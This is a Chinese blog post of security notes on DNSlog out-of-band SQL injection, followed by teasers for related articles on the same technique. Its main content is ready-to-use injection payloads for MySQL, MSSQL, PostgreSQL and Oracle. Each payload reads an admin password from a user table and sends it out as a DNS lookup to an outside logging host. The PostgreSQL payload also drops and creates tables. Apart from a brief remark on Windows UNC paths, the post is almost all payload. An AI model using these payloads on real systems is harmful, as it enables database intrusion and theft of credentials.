Dnslog在SQL注入 & 四种数据库

最新推荐文章于 2024-08-23 04:49:43 发布
最新推荐文章于 2024-08-23 04:49:43 发布
阅读量2.8k 收藏 5
点赞数
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33020901/article/details/88311971
版权

https://www.anquanke.com/post/id/98096

 

mysql

http://127.0.0.1/mysql.php?id=1 union select 1,2,load_file(CONCAT('\\',(SELECT hex(pass) 
FROM test.test_user WHERE name='admin' LIMIT 1),'.mysql.nk40ci.ceye.io\abc'))

mssql

http://127.0.0.1/mssql.php?id=1;
DECLARE @host varchar(1024);SELECT @host=(SELECT master.dbo.fn_varbintohexstr(convert(varbinary,rtrim(pass))) 
FROM test.dbo.test_user where [USER] = 'admin')%2b'.cece.nk40ci.ceye.io';
EXEC('master..xp_dirtree "\'%2b@host%2b'\foobar$"');

postgres

http://127.0.0.1/pgSQL.php?id=1;DROP TABLE IF EXISTS table_output;

CREATE TABLE table_output(content text);

CREATE OR REPLACE FUNCTION temp_function() RETURNS VOID AS $$ DECLARE exec_cmd TEXT;

DECLARE query_result TEXT;

BEGIN SELECT INTO query_result (select encode(pass::bytea,'hex') from test_user where id =1);

exec_cmd := E'COPY table_output(content) FROM E\'\\\\\\\\'||query_result||E'.pSQL.3.nk40ci.ceye.io\\\\foobar.txt\'';

   EXECUTE exec_cmd;

END;

$$ LANGUAGE plpgSQL SECURITY DEFINER;

SELECT temp_function();

oracle // 仅列举了四种函数

1. [UTL_HTTP.REQUEST] select name from test_user where id =1 union SELECT UTL_HTTP.REQUEST((select pass from test_user where id=1)||'.nk40ci.ceye.io') FROM sys.DUAL;

2. [DBMS_LDAP.INIT] select name from test_user where id =1 union SELECT DBMS_LDAP.INIT((select pass from test_user where id=1)||'.nk40ci.ceye.io',80) FROM sys.DUAL;

3. [HTTPURITYPE] select name from test_user where id =1 union SELECT HTTPURITYPE((select pass from test_user where id=1)||'.xx.nk40ci.ceye.io').GETCLOB() FROM sys.DUAL;

4. [UTL_INADDR.GET_HOST_ADDRESS] select name from test_user where id =1 union SELECT UTL_INADDR.GET_HOST_ADDRESS((select pass from test_user where id=1)||'.ddd.nk40ci.ceye.io') FROM sys.DUAL;

 

UNC 对于 DNSLOG 必看,城哥问过我

    load_file函数在Linux下是无法用来做dnslog攻击的,因为在这里就涉及到Windows的一个小Tips——UNC路径。
    UNC是一种命名惯例, 主要用于在Microsoft Windows上指定和映射网络驱动器. UNC命名惯例最多被应用于在局域网中访问文件服务器或者打印机。我们日常常用的网络共享文件就是这个方式。
    因为Linux没有UNC路径这个东西,所以当MySQL处于Linux系统中的时候,是不能使用这种方式外带数据的

 

 

PD_3569
关注
专栏目录
26-4 SQL注入攻击 - 不同数据库系统利用dnslog姿势
weixin_43263566的博客
03-12 136
函数来执行文件读取操作,并通过注入恶意代码来触发 DNS 解析以传输数据到 DNSLog 平台。函数,触发 DNS 解析并将数据传输到 DNSLog 平台,实现数据的传送和记录。函数和恶意注入代码来实现数据传输至 DNSLog 平台,进而利用 DNSLog 来获取数据或执行进一步的操作。先进入mysql的命令行:其他菜单选项 --> MySQL工具 --> MySQL命令行。这段代码是在 MySQL 数据库中执行的恶意注入操作,旨在通过。通过这种方式,攻击者可以利用恶意注入操作来利用数据库管理系统的。
26-5 SQL 注入攻击 - 利用dnslog带回回显信息范例
weixin_43263566的博客
03-14 317
因此,这个 payload 的目的是利用 SQL 注入漏洞,尝试加载指定路径下的文件内容,并将结果返回给攻击者。这个 payload 旨在利用盲注漏洞来执行 SQL 查询,通过。目标:使用 DVWA 的盲注作为靶机,获取数据库信息。函数加载数据库中的内容,并将结果返回给攻击者。
DNS_LOG注入
学习、分享、交流
05-19 1638
DNSLOG注入:利用DNS解析,日志记录把数据库里面的内容给带出来···
SQL注入(Dns注入)---zkaq
weixin_38237216的博客
04-11 1793
1.概念 1.DNS-log:DNS是解析域名的,log是日志记录,DNS-log是记录域名解析记录日志 2.使用场景:在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 3.涉及的函数:LOAD_FILE():读取文件的函数—读取文件并返回文件内容为字符串 ​ a.配置文件中的参数secure_file_priv= ​ b.高版本mysql中会限制 ​ c.既然会被限制那有什么用呢?但是也会存在下面几种情况 有的版本会自动开启 有的网站需要
【技巧】DNSlog外带文件
最新发布
qinjilll的博客
08-23 1391
我们都知道DNS就是将域名解析为ip,用户在浏览器上输入一个域名A.com,就要靠DNS服务器将A.com解析到它的真实ip127.0.0.1,这样就可以访问127.0.0.1服务器上的相应服务。那么DNSlog是什么。DNSlog就是存储在DNS服务器上的域名信息,它记录着用户对域名等的访问信息,类似日志文件。我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功。
SQL注入——DNSLOG注入
qq_52263650的博客
11-17 806
SQL注入——DNSlog注入
SQL注入DNSLog外带注入
dragon的博客
02-21 2979
什么是dnslog呢?DNS就是域名解析服务,把一个域名转换成对应的IP地址,转换完成之后,DNS服务器就会有一个日志记录本次转换的时间、域名、域名对应的ip、请求方的一些信息,这个日志就叫DNSLog。但是想要查看DNSLog信息的人,必须是拥有DNS服务器权限的人,这就使的我们要是用dnslog注入方法的话,就需要搭建自己的一个dns服务器,成本相对较高。所以在此就推荐两个平台,可以快速让我们使用dnslog外带注入也可以使用BurpSuite同样可以实现相应功能。
基本的四种SQL注入方式
热门推荐
qq_43635212的博客
08-30 1万+
目录联合注入基于错误的注入盲注延时注入 以sqli-labs less-1为例 构造 id=1 and 1=1或者id=1 and 1=2都能够正常查询出结果 构造 id=1’ 报错,说明是字符型注入 联合注入 当查询数据会返回显示界面时可以考虑使用union联合查询的方式 联合查询有两个必要条件: 两张虚拟表具有相同的列数 两张虚拟表对应列的数据类型相同 所以当一个地方可以使用联合查询时基本步骤为:猜测虚拟表列数-》获取数据库名-》获取表名-》获取列名-》获取数据 使用order by猜测列数 可
DnslogSQL注入中的实战
Hq_Dream的博客
01-20 3069
DnslogSQL注入中的实战 本文主要讲述Dnslog这种攻击手法在SQL注入中的实战运用,虽然网上对于DnslogSQL注入方面运用的文章也不少。但是很多文章都只是片面的提到了这个攻击方式,或者只是用某个简单的payload做了简单的验证。 本文主要讲述Dnslog这种攻击手法在SQL注入中的实战运用,虽然网上对于DnslogSQL注入方面运用的文章也不少。但是很多文章都只是片面的提到了...
dnslog注入_dnslog盲注
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-09 1844
dnslog注入原理通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将dnslog注入盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。dnslog注入主要用于布尔型盲注、时间型盲注、有注入但是无显示,注入线程太大容易被waf拦截等情况。主要原理就是利用load_file这个函数,这个函数的目的是读取本地文件,也可以对外发送请求,利用这个函数,我们再使用concat函数将dnslog
sql 注入 Dnslog
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-12 391
通常我们面对SQL注入过程中没有回显的情况下,只能通过盲注的方式来判断是否存在SQL注入,但是,使用盲注,手工测试是需要花费大量的时间的,可能会想到使用sqlmap直接去跑出数据,但在实际测试中,使用sqlmap跑盲注,有很大的几率,网站把ip给封掉,这就影响了我们的测试进度,也许你也可以使用代理池。。。
SQL注入DnsLog注入
qq_52310755的博客
03-22 2155
远程访问UNC路径中主机的地址,如果是域名将会进行解析并留下记录,通过查看DNS解析记录(DNS日志)来达到有回显的目的。DnsLog注入就是利用load_file()函数访问远程文件的特点,对延时盲注等无回显的注入或其他无回显的攻击带来回显。正常来讲每个查询记录都会在相应DNS服务器上留下相关的查询日志,一般来说企业或者自己部署的DNS在上图标红位置处,Ps:如果paylaod没有问题但一直刷新不出来可能是谷歌浏览器的问题,换个浏览器访问一下就可以了。,下面以盲注为例,需要有盲注的基础。
SQL注入之搭建dnslog
qq_57686163的博客
08-06 630
《‘。’》
DNSLog注入笔记
weixin_30781433的博客
09-12 866
测试一些网站的时候,一些注入都是无回显的,我们可以写脚本来进行盲注,但有些网站会ban掉我们的ip,这样我们可以通过设置ip代理池解决, 但是盲注往往效率很低,所以产生了DNSlog注入。具体原理如下。 首先需要有一个可以配置的域名,比如:ceye.io,然后通过代理商设置域名 ceye.io 的 nameserver 为自己的服务器 A,然后再服务器 A 上配置好 DNS Server,这样...
SQL注入漏洞-利用DNS进行盲注
HacHunter的博客
03-23 542
在windows下面,可以通过网络路径(NUC)来访问其他主机的资源。其格式如下: \\servername\sharename,其中servername是服务器名。sharename是共享资源的名称。 其中servername可以是主机IP或者域名 当servername是域名的时候,会通过DNS 把域名把dns解析为IP地址。 DNS 服务器:win2003,IP:10.1.1.31添加一条主机记录baidu.com 10.1.1.31 子域名test 委托到10.1.1.251 We..
SQL注入DNS_log注入
weixin_47785246的博客
07-11 902
SQL注入DNS_log注入 这篇文章将系统的讲解,SQL注入中的DNS_log注入的原理、方法、以及靶场练习writeup。 文章目录SQL注入DNS_log注入前言一、DNS_log注入原理二、靶场实战1.DNSlog 平台2.封神台靶场总结 前言 关于SQL注入的详细内容请看我之前写的文章 提示:以下是本篇文章正文内容,下面案例可供参考 一、DNS_log注入原理 我们都知道,DNS解析是一种用户访问域名时,客户端向DNS发起DNS查询的到目标服务器ip地址,进而实现通信的机制,而
dnslogsql注入中的应用
whatday的专栏
07-23 739
目录 1.DNSLOG的原理 2.Dnslog在常见数据库SQL注入的实战 1、MySQL 2、msSQL 3、postgreSQL 4、Oracle 3.总结 1.DNSLOG的原理 DNS的解析是递归与迭代相结合的,下面给出了当我们访问www.cloudcrowd.com.cn时, DNS的解析过程示意图 其中,红色部分是可控的。我们只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级甚至三级域名上去请求,就可以通过DNS解析日志来获取到它们。
SQL注入中使用DNS获取数据
weixin_34203832的博客
03-08 545
Knight · 2015/03/20 15:300x00 前言原文地址: http://arxiv.org/ftp/arxiv/papers/1303/1303.3047.pdf原文作者: Miroslav Štampar本文描述了一种利用DNS解析过程获取恶意SQL查询结果的先进的SQL注入技术。带有sql查询结果的DNS请求最终被攻击者控制的远程域名服务器拦截并提取出宝贵的数据。开源SQL注...
DnslogSQL注入中的利用
weixin_33754913的博客
07-11 333
参考文献:www.anquanke.com/post/id/98096https://bbs.pediy.com/thread-223881.htm DNSlog在Web攻击的利用 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候就可以通过DNSlog把想获得的数据外带出来。 常用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值